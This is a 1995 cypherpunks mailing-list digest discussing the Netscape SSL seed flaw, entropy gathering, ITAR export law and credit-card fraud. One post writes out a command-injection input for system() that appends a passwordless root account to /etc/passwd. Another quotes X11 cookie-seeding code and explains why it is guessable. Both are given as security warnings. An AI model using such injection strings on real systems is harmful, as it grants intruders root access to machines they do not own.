above are mine. From jsw at neon.netscape.com Thu Sep 21 01:41:27 1995 From: jsw at neon.netscape.com (Jeff Weinstein) Date: Thu, 21 Sep 95 01:41:27 PDT Subject: Please send me SSL problems... In-Reply-To: Message-ID: <43r8e5$ove@tera.mcom.com> In article <9509210118.ZM154 at tofuhut>, jsw at netscape.com (Jeff Weinstein) writes: > I don't think that the API that SSLRef export is not particularly interesting. Yikes!! I can't believe I wrote that. What I meant was: I don't think that the API that SSLRef exports is particularly interesting. --Jeff -- Jeff Weinstein - Electronic Munitions Specialist Netscape Communication Corporation jsw at netscape.com - http://home.netscape.com/people/jsw Any opinions expressed above are mine. From damion.furi at the-matrix.com Thu Sep 21 01:45:49 1995 From: damion.furi at the-matrix.com (DAMION FURI) Date: Thu, 21 Sep 95 01:45:49 PDT Subject: What's with the list? (Ol In-Reply-To: <8B18060.00050528DF.uuout@the-matrix.com> Message-ID: <8B180AF.000505293A.uuout@the-matrix.com> DM|Anyone else get old c'punks postings remailed to them from August? Yup. Blech. furi at the-matrix.com pgp-public-key at demon.co.uk C1225CE1 RADical 1 Systems - Multi-Platform Custom Programming, Service, & Support From frank at funcom.no Thu Sep 21 02:34:47 1995 From: frank at funcom.no (Frank A Stevenson) Date: Thu, 21 Sep 95 02:34:47 PDT Subject: netscape's response In-Reply-To: <9509201835.ZM154@tofuhut> Message-ID: On Wed, 20 Sep 1995, Jeff Weinstein wrote: > NOTE: my first attempt to send this bounced at toad.com > > On Sep 20, 5:16pm, David_A Wagner wrote: > > Subject: Re: netscape's response > > In article <9509200139.ZM206 at tofuhut> you write: > > > On Sep 20, 12:29am, Christian Wettergren wrote: > > > > One wild idea that I just got was to have servers and clients exchange > > > > random numbers (not seeds of course), in a kind of chaining way. Since > > > > most viewers connect to a number of servers, and all servers are > > > > connected to by many clients, they would mix "randomness sources" with > > > > each other, making it impossible to observe the local environment > > > > only. And the random values would of course be encrypted under the > > > > session key, making it impossible to "watch the wire". > > > > > > Wow, this is a great idea!! > > > > Are you quite sure this is a good idea? > > > > I'd be very scared of it. In particular, it opens up the chance for > > adversaries to feed you specially chosen numbers to pollute your seeds. Suppose you divide your random material into several parts: A: Userinput (updated from Keystroke timing etc.) B: 'Random' numbers from remote server C: Time, pid, ppid, etc.. D: other... Whenever you want to incorporate new data into B you could do something like: B = B xor Hash (A,B,C,D, fresh 'random') This would be very hard to pollute with well chosen input. > > What I should have said is that its a very interesting idea. Given > current perceptions of netscape, I should have made clear that I > wouldn't do something like this without getting a lot more discussion > and review of possible dangers and how to avoid them. I certainly > can't fault anyone for wondering if we would just implement this > without thinking it through, given recent events. > Frank From jirib at sweeney.cs.monash.edu.au Thu Sep 21 02:59:56 1995 From: jirib at sweeney.cs.monash.edu.au (Jiri Baum) Date: Thu, 21 Sep 95 02:59:56 PDT Subject: Exchange random numbers (was: Re: netscape's response) In-Reply-To: <199509210153.SAA25449@Csli.Stanford.EDU> Message-ID: <199509210958.TAA10764@sweeney.cs.monash.edu.au> -----BEGIN PGP SIGNED MESSAGE----- Hello Bill Stewart and cypherpunks at toad.com, "Jeff Weinstein" and Christian Wettergren Christian Wettergren writes: > Christian (that's me) writes: > | One wild idea that I just got was to have servers and clients exchange > | random numbers (not seeds of course), in a kind of chaining way. Since ... > Bill Stewart answered: > | Be _very_ careful with this approach - it's the kind of thing that a > | rogue server or client might abuse to find out randomness or other state ... > Of course you have to be very careful, as you say. Did you see my > problem-section in the original letter? I included it above. ... [the referenced section elided by jirib] ... If I only ever give out a hash of my seed, and only ever *add* any received info to my seed (and stir it in well), how can anyone find out anything? (Apart from hash weaknesses.) The only thing that remains is that I cannot really count on a stranger to actually give me something truly random. In fact, since at least one other person knows it, I shouldn't count any entropy from it at all. However, if I get e bits from each of n servers, and k of them are rogue, then I have e*(n-k) bits, ie e*n*(1-k/n). With a suitably conservative estimate of k/n, this should be acceptable. In any case, accepting donations of entropy cannot possibly reduce the amount of entropy I have, can it? As well as the normal servers, there might be dedicated randomness servers whose sole purpose is to give you a random number. For a toy example, see http://www.cs.monash.edu.au/cgi-bin/cgiwrap/~jirib/random?ToyRandValue (where ToyRandValue should be replaced by whatever your random value is). Again, one would connect to several and stir the results together, confident in the statistics that say at least one is genuine. Of course, we then have a chicken-and-egg problem of getting secure connection to the randomness servers, but we have that anyway. Perhaps each client could keep a pool of randomness, and whenever it runs low connect to the randomness servers to re-fill, initially using "type random text". ... > and that you should only give out approximately the same amount of > randomness to the neighbour, as you point out below. ... I'm not sure I follow this one. Why? If the neighbour is willing to trust me for more, and cannot possibly deduce my seed from the numbers ('cause it's a strong 1-way hash), the only thing it costs me is CPU time - it'd cost me more to keep track of who asked for how much when. ... > My approach solves part of the problem of "the observable local > environment" problem. ... Then again, you can always ping. With a well-chosen target, you get 10 bits raw from the first packet... Perhaps about 7 or 8 of actual usable entropy (and before you flame me, ping melb.dialix.oz.au). Part of this is that once the sources of randomness are sufficiently diverse, it's just easier for an attacker to modify your s/w. Especially if you never throw out your seed, so that all your interactions since the beginning are unfathomably stirred into your current key. (Ie I might not mind if I have only 1 bit of entropy per transaction provided that the total entropy is 128 bits. Provided I never reveal my seed, of course. This would mean that the value risked on any particular 128 bits are 128 of my transactions, not just one, but for most people each of those transactions will involve the same CC number so it makes no difference anyway.) Hope that makes sense... Jiri - -- If you want an answer, please mail to . On sweeney, I may delete without reading! PGP 463A14D5 (but it's at home so it'll take a day or two) PGP EF0607F9 (but it's at uni so don't rely on it too much) -----BEGIN PGP SIGNATURE----- Version: 2.6.2i iQCVAwUBMGE3JixV6mvvBgf5AQFcWwP/UMbLaF2IM7y8HAjVUOCRoE4xgp+XkAj9 zQAnd0XnW5nbwqoXJe/WiT/4QQ3Rx/2tV8OhskS1dhy/7WEZ1WtTsEu4Of3YUDJp rOYf5omToxLVXWNUQrCYUtGUjJo2UdUg2N8NfIR+vXrsZG7HPhfXsrRD9C0W1HJw yIfcZUzz+s4= =KJsK -----END PGP SIGNATURE----- From frissell at panix.com Thu Sep 21 03:42:30 1995 From: frissell at panix.com (Duncan Frissell) Date: Thu, 21 Sep 95 03:42:30 PDT Subject: Cybersecurity In-Reply-To: <9509201549076057@ci.diamond-bar.ca.us> Message-ID: On Thu, 7 Sep 1995 hallam at w3.org wrote: > The UK laabour party is opposed to key escrow "we do not accept the "clipper > chip" argument". The Tories have less than half the level of popular support an > are barely recognisable as a government. > > Phill Wait till Labour finds out that crypto makes "The Caring Society" impossible. Perhaps they'll change their view then. DCF From MIGUELDIAZ at megaweb.com Thu Sep 21 03:46:42 1995 From: MIGUELDIAZ at megaweb.com (Miguel Diaz) Date: Thu, 21 Sep 95 03:46:42 PDT Subject: Seeds which depend on machine states Message-ID: <199509211044.GAA25896@mail-e1a.megaweb.com> It is my suspicion that seeds which depend on machine states(ie state of your computer at a specific instance of time) would always be subject to scrutiny and de-cryption. As long as the software used to encrypt is not self-modifying, the machine state can (through careful manipulation involving temperature, clocks, processes etc)always be replicated and fixed to an acceptable degree. This allows you to look into the heart of the encryption method and then create a plan to decode based on a brute-force attack. Time is the only friend then of the encryptor and unfortunately in the case of credit cards this typically is measured in years. Plenty of time for brute force attacks to yield fruit. I'll be gone for two days. will respond to any comments Saturday. From anonymous at freezone.remailer Thu Sep 21 04:30:45 1995 From: anonymous at freezone.remailer (anonymous at freezone.remailer) Date: Thu, 21 Sep 95 04:30:45 PDT Subject: Fraud Fraut Froth Message-ID: <199509211130.HAA20039@light.lightlink.com> NY Times, Sept 21, 1995. Fraud Can Flourish Without the Internet To the Editor: Your Sept. 19 front-page article on the discovery by two University of California graduate students of a flaw in Netscape, the software used for purchases over the Internet's World Wide Web, raises a number of obvious questions. First, who needs high tech to perpetrate fraud? Any unscrupulous commercial employee could use or sell your credit card number without employing technology. Every time you hand your card to a waiter in a restaurant, it disappears for several minutes. The department store clerks and gas station attendants you deal with also have access to your card number. How secure is that? Ever give your credit card number over the phone to make a purchase from a mail-order house? Or to secure a reservation at a hotel? Who's to say that the employees you're speaking with are honest? Or that your phone is not tapped? Or theirs? I shop on the Internet; I may get ripped off. What's my liability? Fifty bucks -- same as the other scenarios I've described. That's in my credit agreement with the card issuer. So why all the hoopla? Is credit card fraud significantly more prevalent on the Internet than in other modes of purchasing? Or is the banking industry whipping up hysteria among purchasers to curb fraud losses? Was the work of those graduate students funded by someone -- directly or indirectly? If so, by whom? A banking consortium? A high-tech company working on some patentable security scheme? Robert Herrig Peekskill, N.Y., Sept. 19,1995. The writer is a systems consultant. From unicorn at polaris.mindport.net Thu Sep 21 04:52:49 1995 From: unicorn at polaris.mindport.net (Black Unicorn) Date: Thu, 21 Sep 95 04:52:49 PDT Subject: Fraud Fraut Froth In-Reply-To: <199509211130.HAA20039@light.lightlink.com> Message-ID: On Thu, 21 Sep 1995 anonymous at freezone.remailer.mindport.net wrote: > NY Times, Sept 21, 1995. > > Fraud Can Flourish Without the Internet > > To the Editor: > > Your Sept. 19 front-page article on the discovery by two > University of California graduate students of a flaw in > Netscape, the software used for purchases over the Internet's > World Wide Web, raises a number of obvious questions. > > First, who needs high tech to perpetrate fraud? Any > unscrupulous commercial employee could use or sell your credit > card number without employing technology. > > Every time you hand your card to a waiter in a restaurant, it > disappears for several minutes. The department store clerks > and gas station attendants you deal with also have access to > your card number. How secure is that? [...] > > Robert Herrig > Peekskill, N.Y., Sept. 19,1995. > > The writer is a systems consultant. [For Netscape?] --- "In fact, had Bancroft not existed, potestas scientiae in usu est Franklin might have had to invent him." in nihilum nil posse reverti 00B9289C28DC0E55 E16D5378B81E1C96 - Finger for Current Key Information From nsb at radiomail.net Thu Sep 21 05:33:39 1995 From: nsb at radiomail.net (NSB's Portable (via RadioMail)) Date: Thu, 21 Sep 95 05:33:39 PDT Subject: first virtual "security" (!!) (was Re: Security Flaw Is Discovered InSoftware Used in Shopping) Message-ID: At 4:32 AM 9/21/95 +0200, Laurent Demailly wrote: >You have excellent points in your detailed answer, thank you, but Thanks. I'm glad to be able to conduct this discussion at a cordial and intelligent level. >If FV was as used as SSL could be, what prevents, to use your terms, >someone to get MILLIONS of FV's identifiers and use each one only >once, etc ... (imo your figures about SSL and crypto softs risks are >over evaluated, so I over evaluate the 'risks' of yours using same >assumptions) I think you still don't get it, Laurent. If you intercept millions of credit cards, you immediately have something very valuable and untraceable. An FV-ID is much less useful than a credit card number, because it only works with email confirmation and only works on the net. And merely intercepting them doesn't get you anything -- you have to be able to answer the confirmation messages, which is much harder to do "en masse" than passively sniffing for things (and possibly then decrypting them). And a scheme that also replies to such messages is far more likely to leave traces by which the criminal is caught. In other words, when you look at the "millions of interceptions" case, the value of doing this is lower for FV, the difficulty of automating it in the large scale is higher, and the risk of detection is higher, as compared with a one-way scheme that transmits credit cards, whether encrypted or not. >There can't be more security by transferring data on the clear >compared to an encrypted one... except maybe that people using >encryption can often feel overconfident. Of course there can, if you're not talking about the same data, which we're not. It's much safer to transmit something without high intrinsic value in unencrypted form than to transmit something with high intrinsic value in encrypted form. That's why FV-ID's were designed the way they are -- low intrinsic value, easy to revoke & reissue, etc. By analogy, it is safer to send a weather report unencrypted than to send detailed instructions about nuclear weapons encrypted. >So, as someone pointed out, >it is not that much a problem about CC# which are available easily >anyway, but in fact, using encrypted communications is the only way to >ensure (some) *privacy*, in addition to being a security improvement. Also not true. A scheme like FV's gives a fairly high privacy level through the use of pseudonyms. Your FV-ID can be traced to you *only* by FV, and we won't hand out that informaton without a court order. >financial insecurity never was a problem as >long as it remains under a small %. This is an amazing statement, Laurent. It's sort of like saying that building a city in the middle of a flood plain isn't a problem as long as there isn't a flood. You can't dismiss even a low-probability disaster if the consequences of the disaster are extremely high. If the SSL bug had been discovered AFTER there were hundreds of millions of credit cards being transmitted via SSL, and if the person who discovered it had criminal intent, the entire global credit card infrastructure really would have been endangered. Personally, I'm always suspicious of any claims to have "fixed the last bug", so I don't see any reason to assume this isn't inevitable in the long run if a scheme like SSL is used. >Anyway, if you have happy customers, good for you... I'd suggest that >you'd use "Security through Clarity" as motto ;-) That's not a bad motto. I'd prefer to describe our system as focusing on practical, comprehensive security rather than chasing the myth of perfect cryptographic security. (For example, we've probably put more effort into making our server secure from breakins than just about any other site on the Internet.) We're not opposed to cryptography, by the way. There are some obvious places where the use of digital signatures could directly enhance our system, and we're pursuing them. It has also not escaped our notice that, even though we strongly believe that transmitting FV-ID's in the clear is safer than transmitting credit cards encrypted, it would be safer STILL to transmitthe FV-ID's encrypted -- sort of the best of both worlds. And you can count on our doing that when there is a good Internet infrastructure for doing so, which we don't yet believe to be the case. -- Nathaniel From rsalz at osf.org Thu Sep 21 05:36:10 1995 From: rsalz at osf.org (Rich Salz) Date: Thu, 21 Sep 95 05:36:10 PDT Subject: Please send me SSL problems... Message-ID: <9509211235.AA20792@sulphur.osf.org> >None of these organisations have mentioned GSSAPI to me. >Do you have a source? Digital: ask John Wray. IBM: find someone in the DSOM group HP: no name I can give. From junger at pdj2-ra.F-REMOTE.CWRU.Edu Thu Sep 21 06:07:41 1995 From: junger at pdj2-ra.F-REMOTE.CWRU.Edu (Peter D. Junger) Date: Thu, 21 Sep 95 06:07:41 PDT Subject: Munitions shirt (again) Message-ID: Timothy C. May writes: : At 3:49 PM 9/20/95, Ian Goldberg wrote: : >So, Dave and I got free munitions shirts (they're different, though; : >the font is smaller and they have a bunch of X'd out Constitutional : >Amendments on the back; I think they ere designed by Joel Furr) for : >our bug find. : > : >So I'm wearing it today. The thing is, I live in International House, : >a residence that has 50% non-Americans. : > : >So, any consensus as to whether it's actually illegal to do so? I : >remember some disagreement a few weeks ago that AFAIK wasn't resolved. : : The _consensus_ here seems to be: "This t-shirt is illegal to wear in front : of non-Americans," judging by the comments here. Assuming that the International Traffic in Arms Regulations are the law (rather than the unconstitutional silliness that they actually are), this consensus is correct. The ITAR forbid the ``disclosure'' of cryptographic ``software''--very broadly defined--to ``foreign'' persons ``within or without the United States.'' It says nothing about the medium of the disclosure: whether it is a T-shirt or computer screen. : The _reality_ is quite different, I think, and the "this shirt is illegal" : hype is, in my opinion, just that, hyperbole. Even hyperbull, too. : : Books and written articles containing crypto algorithms are _not_ illegal : for "furriners" to look at. The t-shirt contains at most a fuzzy printing : of an algorithm that has been widely printed in various books and in : articles in mailing lists like ours. The fact that the government does not dare to try to enforce the ITAR against those who publish cryptographic software without a license (and the fact that the Office of Defense Trade Controls has waived its jurisdiction to require a license in one case for a book where it retained jurisdiction for a CDrom with the same information) does not mean that it is not a violation of the ITAR to publicly wear a T-shirt with cryptographic software on it; although it does strongly suggest that no one will be prosecuted for such violations. And that is just as well, since the posting on an anonymous FTP server of the C program that cracks the seed for the Netscape security routines is also a technical violation of the ITAR, as even Mr. May will perhaps concede. The fact that warning the world of this security breach is a violation of the ITAR simply shows how silly--and how dangerous--is the ITAR's licensing scheme for the publication of cryptographic software. : (I agree that there are some unresolved issues with ostensibly : machine-readable forms. The t-shirt is not machine-readable by any : plausible interpretation of machine-readable.) There is nothing in the ITAR that refers to ``machine-readable'' so there is no need to interpret that term. - -- Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH Internet: junger at pdj2-ra.f-remote.cwru.edu junger at samsara.law.cwru.edu From junger at pdj2-ra.F-REMOTE.CWRU.Edu Thu Sep 21 06:13:19 1995 From: junger at pdj2-ra.F-REMOTE.CWRU.Edu (Peter D. Junger) Date: Thu, 21 Sep 95 06:13:19 PDT Subject: FROM A FRIEND . . . In-Reply-To: <43qvn4$mm@calum.csclub.uwaterloo.ca> Message-ID: Ian Goldberg writes: : In article <43qrhf$gd5 at tera.mcom.com>, : Jeff Weinstein wrote: : > I think that the general opinion of engineers and management here at : >Netscape is that it would be A Really Good Thing to have our US-only : >128+ bit version of Netscape Navigator available for download by US : >citizens and others who are not legally prohibited from using it. : : Who _is_ legally prohibited from using it? I think there are some countries : where the very use of crypto is illegal (could someone please list them?), : but who else? : : There are some people that may be legally prohibited from _obtaining_ it : from a US site (ITAR yadda), but even so, if JRFurriner downloads : crypto from company C's site in the US, who's guilty of ITAR-violation? : Company C for making it available, or JRF for initiating the action : that caused the bits to be send out of the country? : : - Ian "my, I seem to be posting a lot tonight" Probably both have violated the ITAR, but neither will be actually prosecuted. On the other hand, Company C will be threatened and harassed until it stops making the software available. -- Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH Internet: junger at pdj2-ra.f-remote.cwru.edu junger at samsara.law.cwru.edu From s675570 at aix2.uottawa.ca Thu Sep 21 06:19:13 1995 From: s675570 at aix2.uottawa.ca (s675570 at aix2.uottawa.ca) Date: Thu, 21 Sep 95 06:19:13 PDT Subject: FROM A FRIEND . . . In-Reply-To: <43r488$met@tera.mcom.com> Message-ID: On 21 Sep 1995, Jeff Weinstein wrote: > Poor choice of words on my part. My understanding is that we can not > export our US-only product, except to canada - for the use of canadian > citizens. I also believe that it is illegal for anyone except US citizens, > permanent residents of the US (green card holders) and Canadian citizens > to use it, even within the US. I'm not a lawyer, and I've not read > all of ITAR myself, so I could be totally wrong... > > --Jeff And from what the folks at the Export Controls division of the Department of External Affairs in Ottawa told me, Canadians can't export export-controlled American software, including pgp and other freeware, without a license. OTOH we can export non-US=origin software license-free (well freeware for sure, anyway, I didn't get the whole thing quite right). Of course there are a few countries for which you would need a license, and some UN embargoed countries to which you can't make any exports (both sets are dictatorships or warzones, so not much net access anyway and the crypto laws would make France's look cpunk). They're also waiting to see what happens to Phil Z. to decide whether or not ftp's are exports. All the same, if anyone wants an easy and economical way to get around ITAR, have someone do your cypto software development just north of the border (Vancouver's just north of Seattle and close enough to Silicon Valley, with excellent net-access) or at least just publish it here first. Phil could have saved himself an immense amount of trouble with a short car ride. You Americans on the list could too. Wanna nag your bosses some more Jeff? You'd be doing everyone a favor and get your wish. You can get "A guide to Canada's export controls" from: Foreign Affairs and international trade Canada. Export controls division 125 Sussex Drive, C-4 P.O. Box 481, Station A Ottawa, Ontario K1N 9K6 Fax: (613) 996-9933 Tel: (613) 996-2387 Remember to also ask for the "general software note" For the West Coasters on the list there's also an address closer to home (they have addresses in all the major Canadians cities, if anyone wants visit them personally, send me a msg and I'll mail you nearest address) International Trade Centre Scotia Tower 900-650 West Georgia Street P.O. Box 11610 Vancouver, British Columbia V6B 5H8 Fax: (604) 666-8330 Tel: (604) 666-0434 From pfarrell at netcom.com Thu Sep 21 06:28:44 1995 From: pfarrell at netcom.com (Pat Farrell) Date: Thu, 21 Sep 95 06:28:44 PDT Subject: Patents and trade secrets was: Encryption algorithms used in PrivaSoft Message-ID: <34057.pfarrell@netcom.com> thad at hammerhead.com (Thaddeus J. Beier) writes: > At this point, in this country, a patent is secret until it is issued. This will change in the US fairly soon. It is fallout of one of the world-wide trade and tarriff treaties -- we have to make our patent process be more in line with the rest of the world. One of the big technical challenges that the PTO and PRC have is how to release in-process patents securly. (PRC is the systems integrator for the PTO's APS (advanced Patent System) that had all the text and images of all patents since 1970 online.) They have even talked about putting patents on the WWW, but actually doing it is quite a way off in the future. Pat Pat Farrell Grad Student http://www.isse.gmu.edu/students/pfarrell Info. Systems & Software Engineering, George Mason University, Fairfax, VA PGP key available on homepage #include From perry at piermont.com Thu Sep 21 06:33:23 1995 From: perry at piermont.com (Perry E. Metzger) Date: Thu, 21 Sep 95 06:33:23 PDT Subject: USA Today on Fear of Credit Cards over Net In-Reply-To: <01HVIQUUZ6HU8WX6TO@MAILSRV1.PCY.MCI.NET> Message-ID: <199509211332.JAA01558@frankenstein.piermont.com> Randy Catoe writes: > I'm told that the revenue lost to fraud in the > credit card industry is around .15 percent of the gross purchase value. Thats a giant amount of money in dollars. > I'm also told that the credit card companies actually face higher costs > from disputes, i.e. when you call them up and busy out a person to > resolve a question on you bill. Crypto will also reduce that rate, IMHO. Perry From junger at pdj2-ra.F-REMOTE.CWRU.Edu Thu Sep 21 06:46:15 1995 From: junger at pdj2-ra.F-REMOTE.CWRU.Edu (Peter D. Junger) Date: Thu, 21 Sep 95 06:46:15 PDT Subject: FROM A FRIEND . . . In-Reply-To: <43r488$met@tera.mcom.com> Message-ID: Jeff Weinstein writes: : Poor choice of words on my part. My understanding is that we can not : export our US-only product, except to canada - for the use of canadian : citizens. I also believe that it is illegal for anyone except US citizens, : permanent residents of the US (green card holders) and Canadian citizens : to use it, even within the US. I'm not a lawyer, and I've not read : all of ITAR myself, so I could be totally wrong... There is nothing in U.S. law that prohibits anyone from using a cryptographic product, much to the frustration of the NSA, FBI, etc. That is why they try to forbid speaking about it by pretending that communication of information is exporting something. There is a law that forbids exporting munitions without a license and that is the basis for the ITAR regulations. The funny thing is that a law forbidding the use of cryptography just might be constitutional--though I, for one, am convinced that it would not be--while forbidding communication of information about cryptography without a license is a blatant violation of the First Amendment of the United States constitution. -- Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH Internet: junger at pdj2-ra.f-remote.cwru.edu junger at samsara.law.cwru.edu From rmartin at aw.sgi.com Thu Sep 21 07:01:47 1995 From: rmartin at aw.sgi.com (Richard Martin) Date: Thu, 21 Sep 95 07:01:47 PDT Subject: Canada & ITAR In-Reply-To: Message-ID: <9509211000.ZM22513@glacius.alias.com> [plug plug plug] If you're impatient, much of the relevant text of the the "Canada's Export Controls" booklet is available at http://www.io.org/~samwise/crypto/ frodo =) -- Richard Martin Alias|Wavefront - Toronto Office [Co-op Software Developer, Games Team] rmartin at aw.sgi.com/g4frodo at cdf.toronto.edu http://www.io.org/~samwise Trinity College UofT ChemPhysCompSci 9T7+PEY=9T8 Shad Valley Waterloo 1992 From jgrubs at left.webcasters.com Thu Sep 21 07:18:16 1995 From: jgrubs at left.webcasters.com (Jim Grubs W8GRT) Date: Thu, 21 Sep 95 07:18:16 PDT Subject: USA Today on Fear of Credit Cards over Net Message-ID: <0u8RBD2w165w@left.webcasters.com> "Perry E. Metzger" writes: > > Re: The risk of credit cards. > > I suppose that indeed there are large risks elsewhere in the credit > card system. However, I think that the credit card system itself is > stupid and insecure and ought to be scrapped -- sending around account > numbers as magic keys to get payment is a stupid move. Its not > suprising how large credit card fraud is. Hence the fast growing popularity of those cash cards. -- WebCasters(tm) James C. Grubs jgrubs at left.webcasters.com 6817 Maplewood Avenue Tel.: 419-882-2697 Sylvania, Oh 43560 Fax: 419-885-2814 Internet consulting, HTML programming, Information brokering From cme at TIS.COM Thu Sep 21 07:31:48 1995 From: cme at TIS.COM (Carl Ellison) Date: Thu, 21 Sep 95 07:31:48 PDT Subject: PRNG state (and conditioning) (was Re: netscape's response) In-Reply-To: <199509202031.NAA06951@comsec.com> Message-ID: <9509211428.AA21108@tis.com> If you are looking for PRNG conditioning code, feel free to snarf code from http://www.clark.net/pub/cme/html/ranno.html I'm assuming your new PRNG has enough state (more than 64 bits) that the 128-bit key (or later, larger keys) is worth its bits. I'm assuming you solve the problem of finding enough entropy bits for seeding the PRNG and considering how to keep as much of that entropy as possible in your PRNG seed (rather than, for a silly example, distilling it to an unsigned int for driving rand() ). For example, the state in ranG (from the giveaway code) or in ranM may not by itself lead to a secure PRNG, but when it drives a one-way function (e.g., ranH, ranD, ranN) the state is still serving a purpose. [ranG keeps 186 bytes of state while ranM keeps 32KB of state.] - Carl From sdw at lig.net Thu Sep 21 08:27:41 1995 From: sdw at lig.net (Stephen D. Williams) Date: Thu, 21 Sep 95 08:27:41 PDT Subject: Export via FTP: who's to blame? Ask a court! In-Reply-To: <9509210737.AA10902@toad.com> Message-ID: ... > This is a question that has never been answered by a court. > > Personally I think that the Congress can't constitutionally set up a > scheme that restricts US citizens from communicating with each other ... > If some hardy soul wants to set up a nice clean situation, like Phil > Karn did for the paper-vs-magnetic-media distinction, I'm sure we can > find some more pro-bono (zero cost) lawyers who'll take the case for > the fun and notoriety. You don't have to break the law to get into > court; Phil didn't, for example. You make a situation where the law > restricts you, then sue to have the restriction declared invalid. And > if you have ever been in court, it's a lot more fun being the > Plaintiff than being the Defendant. > > Doing this will take significant time on your part. Even if the > lawyers do 95% of the work, you have to talk with them, review what > they write, explain the details in gory detail, and believe in what > they're doing for you. And sometimes do things in a way that they are > sure is right, even though you yourself aren't sure. And stick with > the case even though it would drag on for years through several > courts. So it's not something to do lightly. But it's worth it. And > it's a lot safer and easier to enforce your civil rights now, than to > try to live through the civil war that would follow the slide into > authoritarian government. > > I'd do this case myself, except that I think we should have few single > points of failure. If we spread the work around, it's more likely to > happen. And your civil rights are safer, because you yourself have > learned how to defend them. > > John I recently moved to the DC area (N VA) and might be amenable to a relatively harmless scenario like this. (Not that I have much time, but I'm flexible.) sdw -- Stephen D. Williams 25Feb1965 VW,OH (FBI ID) sdw at lig.net http://www.lig.net/sdw Consultant, Vienna,VA Mar95- 703-918-1491W 43392 Wayside Cir.,Ashburn, VA 22011 OO/Unix/Comm/NN ICBM/GPS: 39 02 37N, 77 29 16W home, 38 54 04N, 77 15 56W Pres.:Concinnous Consulting,Inc.;SDW Systems;Local Internet Gateway Co.;28May95 From patrick at Verity.COM Thu Sep 21 08:28:18 1995 From: patrick at Verity.COM (Patrick Horgan) Date: Thu, 21 Sep 95 08:28:18 PDT Subject: "random" number seeds vs. Netscape Message-ID: <9509211524.AA17588@cantina.verity.com> Philip L. Karlton said: > > I agree, but I have a hard arguing with those that asser that the security > of UNIX is weak enough that given what we are doing for the patch it will > be easier to become root from a logged in account than to hack the seed. > Why would you have to argue with them? When they say that's it's easier to become root from a logged in account tell them, "Good, that's just as it should be!" It's a feature, not a problem! Patrick _______________________________________________________________________ / These opinions are mine, and not Verity's (except by coincidence;). \ | (\ | | Patrick J. Horgan Verity Inc. \\ Have | | patrick at verity.com 1550 Plymouth Street \\ _ Sword | | Phone : (415)960-7600 Mountain View \\/ Will | | FAX : (415)960-7750 California 94303 _/\\ Travel | \___________________________________________________________\)__________/ From patrick at Verity.COM Thu Sep 21 08:30:42 1995 From: patrick at Verity.COM (Patrick Horgan) Date: Thu, 21 Sep 95 08:30:42 PDT Subject: RSA Prevails In Arbitration Against Cylink Message-ID: <9509211527.AA17593@cantina.verity.com> > Just a note for those who aren't aware, Business Wire is a pay-per-use > "news release" service. That is, RSA wrote the contents of what Bob > (Hi!) posted. > > The clue is at the bottom of the "story": > > CONTACT: RSA > Kurt Stammberger, 415/595-8782 > kurt at rsa.com > > This is not to say anything pro or con about the content of the press > release; just that it wasn't written by a third party. > > /jordan > I can't imagine that anyone wouldn't have known that, it was written from RSA's point of view. Patrick _______________________________________________________________________ / These opinions are mine, and not Verity's (except by coincidence;). \ | (\ | | Patrick J. Horgan Verity Inc. \\ Have | | patrick at verity.com 1550 Plymouth Street \\ _ Sword | | Phone : (415)960-7600 Mountain View \\/ Will | | FAX : (415)960-7750 California 94303 _/\\ Travel | \___________________________________________________________\)__________/ From iagoldbe at csclub.uwaterloo.ca Thu Sep 21 08:50:26 1995 From: iagoldbe at csclub.uwaterloo.ca (Ian Goldberg) Date: Thu, 21 Sep 95 08:50:26 PDT Subject: XDM has the same problem as netscape ?! In-Reply-To: <199509202041.NAA07036@comsec.com> Message-ID: <43s1j7$nd3@calum.csclub.uwaterloo.ca> In article <9509210631.AA18308 at sfi.santafe.edu>, Nelson Minar wrote: >Last time I looked, the MIT-MAGIC-COOKIE-1 scheme used in X11R4 had >the same problem: the random seed was based on the current time to the >microsecond, modulo the granularity of the system clock. I think I >figured that on my hardware, if I could figure out which minute the X >server started (easy with finger), I'd only have to try a few >thousand keys or so. Caveat: I never actually proved the idea. Wow. I just checked, and Nelson's right. The seed is this: #ifdef ITIMER_REAL { struct timeval now; X_GETTIMEOFDAY (&now); ldata[0] = now.tv_sec; ldata[1] = now.tv_usec; } #else { long time (); ldata[0] = time ((long *) 0); ldata[1] = getpid (); } #endif and if you don't have XDMAUTH defined, the auth value is this: seed = (ldata[0]) + (ldata[1] << 16); srand (seed); for (i = 0; i < len; i++) { value = rand (); auth[i] = value & 0xff; } Oh, well. We knew X didn't have much in the way of security, anyway... - Ian From patrick at Verity.COM Thu Sep 21 08:57:20 1995 From: patrick at Verity.COM (Patrick Horgan) Date: Thu, 21 Sep 95 08:57:20 PDT Subject: "random" number seeds vs. Netscape Message-ID: <9509211553.AA17620@cantina.verity.com> Perry said: > > Also be especially careful about how you run the thing! Don't use > popen or anything like it! There's nothing inherently wrong with using popen or system. The problem arises when you use information given to you from outside as the argument to popen or system without checking it. You should have an awareness that whatever you pass to system or popen is essentially being passed as the commandstring to a: execl("/bin/sh", "sh", "-c", commandstring, (char *)0); Make sure you know the implications of this. If you know that what you're passing can happily be exec'd directly, it's more efficient to do an exec yourself instead of (effectively) having a sh exec'd to exec your code. Of course you can see that you shouldn't do something like: cout << "Enter the directory to list: " cin >> buffer; system(buffer); especially if you're running with any sort of priviledges. Suppose someone entered: / ; echo >>/etc/passwd "gotcha::0:0:Intruder Man:/:/sbin/sh Obviously if this program was being run as root you'd be in trouble. If it was running as a user it would let them do something like add an .rhosts for the user that would let them get on the machine. Once on a machine it's often fairly easy to leverage that access into root access. Oh well, I could talk about security all day:) Patrick _______________________________________________________________________ / These opinions are mine, and not Verity's (except by coincidence;). \ | (\ | | Patrick J. Horgan Verity Inc. \\ Have | | patrick at verity.com 1550 Plymouth Street \\ _ Sword | | Phone : (415)960-7600 Mountain View \\/ Will | | FAX : (415)960-7750 California 94303 _/\\ Travel | \___________________________________________________________\)__________/ From tcmay at got.net Thu Sep 21 09:00:23 1995 From: tcmay at got.net (Timothy C. May) Date: Thu, 21 Sep 95 09:00:23 PDT Subject: Netscape is doing well -- give 'em a break. Message-ID: At 5:52 AM 9/21/95, John Gilmore wrote: >All progress is by steps. Let's step on each others' shoulders, not >on each others' toes. Netscape is doing us a favor by pushing strong >crypto. We are doing them a favor by pointing out problems before >they cause major losses to Netscape customers. The result is higher >security for everyone, and more respect for each other's efforts. So >kindly show them a little... I agree strongly with 